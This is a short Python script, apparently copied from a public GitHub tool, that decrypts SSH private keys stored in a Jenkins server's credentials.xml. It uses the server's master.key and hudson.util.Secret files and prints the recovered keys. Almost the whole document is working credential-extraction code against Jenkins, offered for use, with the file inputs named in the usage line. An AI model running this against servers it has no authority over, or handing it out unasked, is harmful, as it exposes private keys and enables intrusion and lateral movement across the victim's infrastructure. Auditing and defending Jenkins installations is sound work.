Decrypt jenkins ssh hashes

jenkins-ssh-decrypt.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# original: https://raw.githubusercontent.com/tweksteen/jenkins-decrypt/master/decrypt.py
# detailed explanation: http://thiébaud.fr/jenkins_credentials.html

import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES

MAGIC = "::::MAGIC::::"

def usage():
	print "./decrypt.py <master.key> <hudson.util.Secret> <credentials.xml>"
	sys.exit(0)

def main():
	if len(sys.argv) != 4:
		usage()

	master_key = open(sys.argv[1]).read()
	hudson_secret_key = open(sys.argv[2], 'rb').read()
	hashed_master_key = sha256(master_key).digest()[:16]
	o = AES.new(hashed_master_key, AES.MODE_ECB)
	x = o.decrypt(hudson_secret_key)
	assert MAGIC in x

	k = x[:-16] 
	k = k[:16]
	credentials = open(sys.argv[3]).read()
	keys = re.findall(r'<privateKey>(.*?)</privateKey>', credentials, re.DOTALL)

	for key in keys:
		p = base64.decodestring(key)
		o = AES.new(k, AES.MODE_ECB)
		x = o.decrypt(p)
		print x
		assert MAGIC in x
		print re.findall('(.*)' + MAGIC, x)[0]


if __name__ == '__main__':
	main()